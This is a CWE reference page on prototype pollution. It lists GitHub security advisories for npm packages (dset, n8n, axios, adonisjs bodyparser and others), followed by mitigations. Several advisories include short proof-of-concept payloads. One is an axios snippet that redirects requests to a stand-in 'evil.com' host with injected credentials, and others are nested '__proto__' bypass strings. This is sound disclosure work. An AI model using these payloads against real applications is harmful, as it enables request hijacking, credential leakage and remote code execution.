CWE-1321
AllowedImproperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
Abstraction: Variant · Status: Incomplete
The product receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype.
783 vulnerabilities reference this CWE, most recent first.
GHSA-Q4J7-V27R-FGCX
Vulnerability from github – Published: 2022-01-13 15:00 – Updated: 2022-01-11 18:13All versions of package realms-shim are vulnerable to Sandbox Bypass via a Prototype Pollution attack vector.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "realms-shim"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.2.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-23543"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2022-01-11T18:13:17Z",
"nvd_published_at": "2022-01-10T14:10:00Z",
"severity": "CRITICAL"
},
"details": "All versions of package realms-shim are vulnerable to Sandbox Bypass via a Prototype Pollution attack vector.",
"id": "GHSA-q4j7-v27r-fgcx",
"modified": "2022-01-11T18:13:17Z",
"published": "2022-01-13T15:00:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23543"
},
{
"type": "PACKAGE",
"url": "https://github.com/Agoric/realms-shim"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JS-REALMSSHIM-2309908"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/package/realms-shim"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Prototype Pollution in realms-shim"
}
GHSA-Q4XC-7CW8-CGFJ
Vulnerability from github – Published: 2022-05-24 17:37 – Updated: 2024-02-01 21:04Overview
Prototype pollution vulnerability in 'dset' versions 1.0.0 through 2.0.1 allows attacker to cause a denial of service and may lead to remote code execution.
Details
The NPM module 'dset' can be abused by Prototype Pollution vulnerability since the function ‘export ()' did not check for the type of object before assigning value to the property. Due to this flaw an attacker could create a non-existent property or able to manipulate the property which leads to Denial of Service or potentially Remote code execution.
PoC
The export function accepts three arguments obj, keys, val. Due to the absence of validation, at values passed into keys, val arguments, an attacker can supply a malicious value by adjusting the keys value to include the __proto__ property. Since there is no validation before assigning property to check whether the assigned keys is the Object's own property or not, the property isAdmin will be directly be assigned to the empty obj({}) thereby polluting the Object prototype. Later in the code, if there is a check to validate isAdmin the valued would be substituted as "true" as it had been polluted.
const dset = require('dset');
var obj = {}
console.log("Before : " + obj.isAdmin);
dset(obj, '__proto__.polluted', true);
console.log("After : " + obj.polluted);
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "dset"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "2.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-28277"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2024-02-01T21:04:19Z",
"nvd_published_at": "2020-12-29T17:15:00Z",
"severity": "CRITICAL"
},
"details": "### Overview\nPrototype pollution vulnerability in \u0027dset\u0027 versions 1.0.0 through 2.0.1 allows attacker to cause a denial of service and may lead to remote code execution.\n\n### Details\nThe NPM module \u0027dset\u0027 can be abused by Prototype Pollution vulnerability since the function \u2018export ()\u0027 did not check for the type of object before assigning value to the property. Due to this flaw an attacker could create a non-existent property or able to manipulate the property which leads to Denial of Service or potentially Remote code execution.\n\n### PoC\nThe export function accepts three arguments `obj, keys, val`. Due to the absence of validation, at values passed into `keys, val` arguments, an attacker can supply a malicious value by adjusting the `keys` value to include the `__proto__` property. Since there is no validation before assigning property to check whether the assigned `keys` is the Object\u0027s own property or not, the property `isAdmin` will be directly be assigned to the empty obj({}) thereby polluting the Object prototype. Later in the code, if there is a check to validate `isAdmin` the valued would be substituted as \"true\" as it had been polluted.\n\n```js\nconst dset = require(\u0027dset\u0027);\nvar obj = {}\nconsole.log(\"Before : \" + obj.isAdmin);\ndset(obj, \u0027__proto__.polluted\u0027, true);\nconsole.log(\"After : \" + obj.polluted);\n```\n",
"id": "GHSA-q4xc-7cw8-cgfj",
"modified": "2024-02-01T21:04:19Z",
"published": "2022-05-24T17:37:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28277"
},
{
"type": "WEB",
"url": "https://github.com/lukeed/dset/issues/11"
},
{
"type": "WEB",
"url": "https://github.com/lukeed/dset/commit/2b9ec49e231107b1a83b04a1bc1a66a8d14cea1c"
},
{
"type": "WEB",
"url": "https://github.com/lukeed/dset/blob/50a6ead172d1466a96035eff00f8eb465ccd050a/src/index.js#L6"
},
{
"type": "WEB",
"url": "https://web.archive.org/web/20210104204657/https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28277"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "dset vulnerable to prototype pollution"
}
GHSA-Q5F4-99JV-PGG5
Vulnerability from github – Published: 2026-04-29 21:25 – Updated: 2026-05-08 01:31Impact
A flaw in the xml2js library used to parse XML request bodies in n8n's webhook handler allowed prototype pollution via a crafted XML payload. An authenticated user with permission to create or modify workflows could exploit this to pollute the JavaScript object prototype and, by chaining the pollution with the Git node's SSH operations, achieve remote code execution on the n8n host.
Patches
The issue has been fixed in n8n versions 1.123.32, 2.17.4, and 2.18.1. Users should upgrade to one of these versions or later to remediate the vulnerability.
Workarounds
If upgrading is not immediately possible, administrators should consider the following temporary mitigations: - Limit workflow creation and editing permissions to fully trusted users only.
These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.
n8n has adopted CVSS 4.0 as primary score for all security advisories. CVSS 3.1 vector strings are provided for backwards compatibility.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "n8n"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.123.32"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "n8n"
},
"ranges": [
{
"events": [
{
"introduced": "2.18.0"
},
{
"fixed": "2.18.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "n8n"
},
"ranges": [
{
"events": [
{
"introduced": "2.17.0"
},
{
"fixed": "2.17.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42231"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-29T21:25:02Z",
"nvd_published_at": "2026-05-04T19:16:05Z",
"severity": "CRITICAL"
},
"details": "## Impact\nA flaw in the `xml2js` library used to parse XML request bodies in n8n\u0027s webhook handler allowed prototype pollution via a crafted XML payload. An authenticated user with permission to create or modify workflows could exploit this to pollute the JavaScript object prototype and, by chaining the pollution with the Git node\u0027s SSH operations, achieve remote code execution on the n8n host.\n\n## Patches\nThe issue has been fixed in n8n versions 1.123.32, 2.17.4, and 2.18.1. Users should upgrade to one of these versions or later to remediate the vulnerability.\n\n## Workarounds\nIf upgrading is not immediately possible, administrators should consider the following temporary mitigations:\n- Limit workflow creation and editing permissions to fully trusted users only.\n\nThese workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.\n\n---\nn8n has adopted CVSS 4.0 as primary score for all security advisories. CVSS 3.1 vector strings are provided for backwards compatibility.\n\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"id": "GHSA-q5f4-99jv-pgg5",
"modified": "2026-05-08T01:31:38Z",
"published": "2026-04-29T21:25:02Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/n8n-io/n8n/security/advisories/GHSA-q5f4-99jv-pgg5"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42231"
},
{
"type": "PACKAGE",
"url": "https://github.com/n8n-io/n8n"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "n8n has Prototype Pollution in XML Webhook Body Parser that Leads to RCE"
}
GHSA-Q5J8-9M9G-X2JH
Vulnerability from github – Published: 2025-02-06 06:31 – Updated: 2025-02-06 23:30A prototype pollution in the lib.requireFromString function of module-from-string v3.3.1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted payload.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "module-from-string"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "3.3.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-57072"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2025-02-06T23:30:54Z",
"nvd_published_at": "2025-02-05T22:15:31Z",
"severity": "HIGH"
},
"details": "A prototype pollution in the lib.requireFromString function of module-from-string v3.3.1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted payload.",
"id": "GHSA-q5j8-9m9g-x2jh",
"modified": "2025-02-06T23:30:54Z",
"published": "2025-02-06T06:31:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-57072"
},
{
"type": "WEB",
"url": "https://gist.github.com/tariqhawis/8b1fe301dd1ea52952cef347daddee67"
},
{
"type": "PACKAGE",
"url": "https://github.com/exuanbo/module-from-string"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "module-from-string prototype pollution"
}
GHSA-Q8JQ-4RM5-4HM5
Vulnerability from github – Published: 2025-04-01 14:54 – Updated: 2025-04-01 14:54Impact
alizeait unflatto <= 1.0.2 was discovered to contain a prototype pollution via the method exports.unflatto at /dist/index.js. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.
Patches
The problem has been patched in 1.0.3
References
https://github.com/advisories/GHSA-799q-f2px-wx8c
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@alizeait/unflatto"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.0.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-38988"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2025-04-01T14:54:36Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Impact\nalizeait unflatto \u003c= 1.0.2 was discovered to contain a prototype pollution via the method exports.unflatto at /dist/index.js. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.\n\n### Patches\nThe problem has been patched in 1.0.3\n\n\n### References\nhttps://github.com/advisories/GHSA-799q-f2px-wx8c",
"id": "GHSA-q8jq-4rm5-4hm5",
"modified": "2025-04-01T14:54:37Z",
"published": "2025-04-01T14:54:36Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/alizeait/unflatto/security/advisories/GHSA-q8jq-4rm5-4hm5"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-38988"
},
{
"type": "WEB",
"url": "https://github.com/alizeait/unflatto/issues/32"
},
{
"type": "WEB",
"url": "https://github.com/alizeait/unflatto/commit/3c1b120f1dcd44eefe07d4a5022e1baa3c7164d3"
},
{
"type": "WEB",
"url": "https://gist.github.com/mestrtee/4c5dfb66bea377889c44dd6c8af28713"
},
{
"type": "PACKAGE",
"url": "https://github.com/alizeait/unflatto"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "@alizeait/unflatto Prototype Pollution"
}
GHSA-Q8QP-CVCW-X6JJ
Vulnerability from github – Published: 2026-05-05 00:18 – Updated: 2026-05-12 13:28Summary
Five config properties in the HTTP adapter are read via direct property access without hasOwnProperty guards, making them exploitable as prototype pollution gadgets. When Object.prototype is polluted by another dependency in the same process, axios silently picks up these polluted values on every outbound HTTP request.
Affected Properties
config.auth(lib/adapters/http.jsline 617) Injects attacker-controlledAuthorizationheader on all requests.config.baseURL(lib/helpers/resolveConfig.jsline 18) Redirects all requests using relative URLs to an attacker-controlled server.config.socketPath(lib/adapters/http.jsline 669) Redirects requests to internal Unix sockets (e.g. Docker daemon).config.beforeRedirect(lib/adapters/http.jsline 698) Executes attacker-supplied callback during HTTP redirects.config.insecureHTTPParser(lib/adapters/http.jsline 712) Enables Node.js insecure HTTP parser on all requests.
Proof of Concept
const axios = require('axios');
// Prototype pollution from a vulnerable dependency in the same process
Object.prototype.auth = { username: 'attacker', password: 'exfil' };
Object.prototype.baseURL = 'https://evil.com';
await axios.get('/api/users');
// Request is sent to: https://evil.com/api/users
// With header: Authorization: Basic YXR0YWNrZXI6ZXhmaWw=
// Attacker receives both the request and injected credentials
Impact
- Credential injection: Every axios request includes an attacker-controlled
Authorizationheader, leaking request contents to any server that logs auth headers. - Request hijacking: All requests using relative URLs are silently redirected to an attacker-controlled server.
- SSRF: Requests can be redirected to internal Unix sockets, enabling container escape in Docker environments.
- Code execution: Attacker-supplied functions execute during HTTP redirects.
- Parser weakening: Insecure HTTP parser enabled on all requests, enabling request smuggling.
Root Cause
mergeConfig() iterates Object.keys({...config1, ...config2}), which only returns own properties. When neither the defaults nor the user config sets these properties, they are absent from the merged config. The HTTP adapter then reads them via direct property access (config.auth, config.socketPath, etc.), which traverses the prototype chain and picks up polluted values.
The own() helper at lib/adapters/http.js line 336 exists and guards 8 other properties (data, lookup, family, httpVersion, http2Options, responseType, responseEncoding, transport) from this exact attack. The 5 properties listed above are not included in this protection.
Suggested Fix
Apply the existing own() helper to all affected properties:
const configAuth = own('auth');
if (configAuth) {
const username = configAuth.username || '';
const password = configAuth.password || '';
auth = username + ':' + password;
}
Same pattern for socketPath, beforeRedirect, insecureHTTPParser, and a hasOwnProperty check for baseURL in resolveConfig.js.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "axios"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.15.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42264"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-05T00:18:38Z",
"nvd_published_at": "2026-05-08T04:16:20Z",
"severity": "HIGH"
},
"details": "## Summary\n\nFive config properties in the HTTP adapter are read via direct property access without `hasOwnProperty` guards, making them exploitable as prototype pollution gadgets. When `Object.prototype` is polluted by another dependency in the same process, axios silently picks up these polluted values on every outbound HTTP request.\n\n## Affected Properties\n\n1. **`config.auth`** (`lib/adapters/http.js` line 617) Injects attacker-controlled `Authorization` header on all requests.\n2. **`config.baseURL`** (`lib/helpers/resolveConfig.js` line 18) Redirects all requests using relative URLs to an attacker-controlled server.\n3. **`config.socketPath`** (`lib/adapters/http.js` line 669) Redirects requests to internal Unix sockets (e.g. Docker daemon).\n4. **`config.beforeRedirect`** (`lib/adapters/http.js` line 698) Executes attacker-supplied callback during HTTP redirects.\n5. **`config.insecureHTTPParser`** (`lib/adapters/http.js` line 712) Enables Node.js insecure HTTP parser on all requests.\n\n## Proof of Concept\n\n```javascript\nconst axios = require(\u0027axios\u0027);\n\n// Prototype pollution from a vulnerable dependency in the same process\nObject.prototype.auth = { username: \u0027attacker\u0027, password: \u0027exfil\u0027 };\nObject.prototype.baseURL = \u0027https://evil.com\u0027;\n\nawait axios.get(\u0027/api/users\u0027);\n// Request is sent to: https://evil.com/api/users\n// With header: Authorization: Basic YXR0YWNrZXI6ZXhmaWw=\n// Attacker receives both the request and injected credentials\n```\n\n## Impact\n\n- **Credential injection:** Every axios request includes an attacker-controlled `Authorization` header, leaking request contents to any server that logs auth headers.\n- **Request hijacking:** All requests using relative URLs are silently redirected to an attacker-controlled server.\n- **SSRF:** Requests can be redirected to internal Unix sockets, enabling container escape in Docker environments.\n- **Code execution:** Attacker-supplied functions execute during HTTP redirects.\n- **Parser weakening:** Insecure HTTP parser enabled on all requests, enabling request smuggling.\n\n## Root Cause\n\n`mergeConfig()` iterates `Object.keys({...config1, ...config2})`, which only returns own properties. When neither the defaults nor the user config sets these properties, they are absent from the merged config. The HTTP adapter then reads them via direct property access (`config.auth`, `config.socketPath`, etc.), which traverses the prototype chain and picks up polluted values.\n\nThe `own()` helper at `lib/adapters/http.js` line 336 exists and guards 8 other properties (`data`, `lookup`, `family`, `httpVersion`, `http2Options`, `responseType`, `responseEncoding`, `transport`) from this exact attack. The 5 properties listed above are not included in this protection.\n\n## Suggested Fix\n\nApply the existing `own()` helper to all affected properties:\n\n```javascript\nconst configAuth = own(\u0027auth\u0027);\nif (configAuth) {\n const username = configAuth.username || \u0027\u0027;\n const password = configAuth.password || \u0027\u0027;\n auth = username + \u0027:\u0027 + password;\n}\n```\n\nSame pattern for `socketPath`, `beforeRedirect`, `insecureHTTPParser`, and a `hasOwnProperty` check for `baseURL` in `resolveConfig.js`.",
"id": "GHSA-q8qp-cvcw-x6jj",
"modified": "2026-05-12T13:28:40Z",
"published": "2026-05-05T00:18:38Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/axios/axios/security/advisories/GHSA-q8qp-cvcw-x6jj"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42264"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/pull/10779"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/commit/47915144662f2733e6c051bdcb895a8c8f0586aa"
},
{
"type": "PACKAGE",
"url": "https://github.com/axios/axios"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/releases/tag/v1.15.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Axios has prototype pollution read-side gadgets in HTTP adapter that allow credential injection and request hijacking"
}
GHSA-Q9WR-GCJC-HQ52
Vulnerability from github – Published: 2020-09-04 15:12 – Updated: 2020-08-31 18:55All versions of reggae are vulnerable to prototype pollution. The function set does not restrict the modification of an Object's prototype, which may allow a malicious to add or modify an existing property that will exist on all objects.
Recommendation
No fix is currently available. Consider using an alternative package until a fix is made available.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "reggae"
},
"ranges": [
{
"events": [
{
"introduced": "0.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2020-08-31T18:55:23Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "All versions of `reggae` are vulnerable to prototype pollution. The function `set` does not restrict the modification of an Object\u0027s prototype, which may allow a malicious to add or modify an existing property that will exist on all objects.\n\n\n\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.",
"id": "GHSA-q9wr-gcjc-hq52",
"modified": "2020-08-31T18:55:23Z",
"published": "2020-09-04T15:12:13Z",
"references": [
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/1331"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Prototype Pollution in reggae"
}
GHSA-Q9XG-H756-8689
Vulnerability from github – Published: 2022-05-24 17:48 – Updated: 2023-07-11 17:00Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') in jquery-plugin-query-object 2.2.3 allows a malicious user to inject properties into Object.prototype.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "jquery-query-object"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "2.2.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-20083"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2023-07-11T17:00:33Z",
"nvd_published_at": "2021-04-23T19:15:00Z",
"severity": "HIGH"
},
"details": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027) in jquery-plugin-query-object 2.2.3 allows a malicious user to inject properties into Object.prototype.",
"id": "GHSA-q9xg-h756-8689",
"modified": "2023-07-11T17:00:33Z",
"published": "2022-05-24T17:48:43Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-20083"
},
{
"type": "WEB",
"url": "https://github.com/BlackFan/client-side-prototype-pollution/blob/master/pp/jquery-query-object.md"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7CR6VGITIB2TXXZ6B5QRRWPU5S4BXQPD"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IJX6NVXSRN3RX3YUVEJQ4WUTQSDL3DSR"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/166299/WordPress-Core-5.9.0-5.9.1-Cross-Site-Scripting.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "jquery-plugin-query-object contains prototype pollution vulnerability"
}
GHSA-QCCF-Q7P4-3Q3J
Vulnerability from github – Published: 2020-09-04 15:16 – Updated: 2020-08-31 18:55All versions of safe-object2 are vulnerable to prototype pollution. The settter() function does not restrict the modification of an Object's prototype, which may allow an attacker to add or modify an existing property that will exist on all objects.
Recommendation
No fix is currently available. Consider using an alternative package until a fix is made available.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "safe-object2"
},
"ranges": [
{
"events": [
{
"introduced": "0.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2020-08-31T18:55:32Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "All versions of `safe-object2` are vulnerable to prototype pollution. The `settter()` function does not restrict the modification of an Object\u0027s prototype, which may allow an attacker to add or modify an existing property that will exist on all objects.\n\n\n\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.",
"id": "GHSA-qccf-q7p4-3q3j",
"modified": "2020-08-31T18:55:32Z",
"published": "2020-09-04T15:16:42Z",
"references": [
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/1335"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Prototype Pollution in safe-object2"
}
GHSA-QCM7-3VPR-HJ5H
Vulnerability from github – Published: 2026-06-30 18:34 – Updated: 2026-06-30 18:34Summary
The fix for GHSA-f5x2-vj4h-vg4c / CVE-2026-25754 introduced in commit 40e1c71 is incomplete and can be bypassed through nested prototype pollution payloads.
The original patch replaced the internal FormFields storage object with Object.create(null), preventing direct payloads such as __proto__.polluted. However, payloads containing a non-dangerous segment before __proto__ or constructor.prototype, such as user.__proto__.polluted, still lead to Object.prototype pollution.
This issue is exploitable remotely through a single unauthenticated multipart/form-data request using the default configuration.
Affected versions
>= 10.1.3 < 10.1.5>= 11.0.0-next.9 < 11.0.3
Details
The regression tests added by the original fix only covered direct payloads such as:
__proto__.pollutedconstructor.prototype.polluted
These payloads are blocked because the root object no longer inherits from Object.prototype.
However, lodash _.set() (via @poppinss/utils) still creates intermediate objects using plain {} values. Once a normal segment is encountered, subsequent __proto__ or constructor.prototype segments regain access to Object.prototype.
Impact
An unauthenticated attacker can remotely pollute Object.prototype on any route accepting multipart/form-data requests behind BodyParserMiddleware.
Because the pollution is process-wide, the impact may include authorization bypasses, unexpected behavior in downstream libraries, or prototype pollution gadget chains leading to remote code execution.
Patches
Fixes targeting v6 and v7 have been published below.
Users should upgrade to a version that includes the following fix:
- https://github.com/adonisjs/bodyparser/releases/tag/v10.1.5
- https://github.com/adonisjs/bodyparser/releases/tag/v11.0.3
References
- CWE-1321
- Prior advisory this bypasses: GHSA-f5x2-vj4h-vg4c / CVE-2026-25754
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 10.1.4"
},
"package": {
"ecosystem": "npm",
"name": "@adonisjs/bodyparser"
},
"ranges": [
{
"events": [
{
"introduced": "10.1.3"
},
{
"fixed": "10.1.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 11.0.1"
},
"package": {
"ecosystem": "npm",
"name": "@adonisjs/bodyparser"
},
"ranges": [
{
"events": [
{
"introduced": "11.0.0-next.9"
},
{
"fixed": "11.0.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48795"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-30T18:34:32Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nThe fix for [GHSA-f5x2-vj4h-vg4c](https://github.com/adonisjs/core/security/advisories/GHSA-f5x2-vj4h-vg4c) / CVE-2026-25754 introduced in commit [`40e1c71`](https://github.com/adonisjs/bodyparser/commit/40e1c71f958cffb74f6b91bed6630dca979062ed) is incomplete and can be bypassed through nested prototype pollution payloads.\n\nThe original patch replaced the internal `FormFields` storage object with `Object.create(null)`, preventing direct payloads such as `__proto__.polluted`. However, payloads containing a non-dangerous segment before `__proto__` or `constructor.prototype`, such as `user.__proto__.polluted`, still lead to `Object.prototype` pollution.\n\nThis issue is exploitable remotely through a single unauthenticated `multipart/form-data` request using the default configuration.\n\n### Affected versions\n\n- `\u003e= 10.1.3 \u003c 10.1.5`\n- `\u003e= 11.0.0-next.9 \u003c 11.0.3`\n\n### Details\n\nThe regression tests added by the original fix only covered direct payloads such as:\n\n- `__proto__.polluted`\n- `constructor.prototype.polluted`\n\nThese payloads are blocked because the root object no longer inherits from `Object.prototype`.\n\nHowever, lodash `_.set()` (via `@poppinss/utils`) still creates intermediate objects using plain `{}` values. Once a normal segment is encountered, subsequent `__proto__` or `constructor.prototype` segments regain access to `Object.prototype`.\n\n### Impact\n\nAn unauthenticated attacker can remotely pollute `Object.prototype` on any route accepting multipart/form-data requests behind `BodyParserMiddleware`.\n\nBecause the pollution is process-wide, the impact may include authorization bypasses, unexpected behavior in downstream libraries, or prototype pollution gadget chains leading to remote code execution.\n\n### Patches\n\nFixes targeting v6 and v7 have been published below.\n\nUsers should upgrade to a version that includes the following fix:\n\n- https://github.com/adonisjs/bodyparser/releases/tag/v10.1.5\n- https://github.com/adonisjs/bodyparser/releases/tag/v11.0.3\n\n### References\n\n- [CWE-1321](https://cwe.mitre.org/data/definitions/1321.html)\n- Prior advisory this bypasses: [GHSA-f5x2-vj4h-vg4c](https://github.com/adonisjs/core/security/advisories/GHSA-f5x2-vj4h-vg4c) / CVE-2026-25754",
"id": "GHSA-qcm7-3vpr-hj5h",
"modified": "2026-06-30T18:34:32Z",
"published": "2026-06-30T18:34:32Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/adonisjs/core/security/advisories/GHSA-f5x2-vj4h-vg4c"
},
{
"type": "WEB",
"url": "https://github.com/adonisjs/core/security/advisories/GHSA-qcm7-3vpr-hj5h"
},
{
"type": "WEB",
"url": "https://github.com/adonisjs/bodyparser/commit/40e1c71f958cffb74f6b91bed6630dca979062ed"
},
{
"type": "WEB",
"url": "https://github.com/adonisjs/bodyparser/releases/tag/v10.1.5"
},
{
"type": "WEB",
"url": "https://github.com/adonisjs/bodyparser/releases/tag/v11.0.3"
},
{
"type": "PACKAGE",
"url": "https://github.com/adonisjs/core"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
"type": "CVSS_V3"
}
],
"summary": "@adonisjs/bodyparser has an incomplete fix for CVE-2026-25754"
}
Mitigation
By freezing the object prototype first (for example, Object.freeze(Object.prototype)), modification of the prototype becomes impossible.
Mitigation
By blocking modifications of attributes that resolve to object prototype, such as proto or prototype, this weakness can be mitigated.
Mitigation
Strategy: Input Validation
When handling untrusted objects, validating using a schema can be used.
Mitigation
By using an object without prototypes (via Object.create(null) ), adding object prototype attributes by accessing the prototype via the special attributes becomes impossible, mitigating this weakness.
Mitigation
Map can be used instead of objects in most cases. If Map methods are used instead of object attributes, it is not possible to access the object prototype or modify it.
CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs
In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.
CAPEC-180: Exploiting Incorrectly Configured Access Control Security Levels
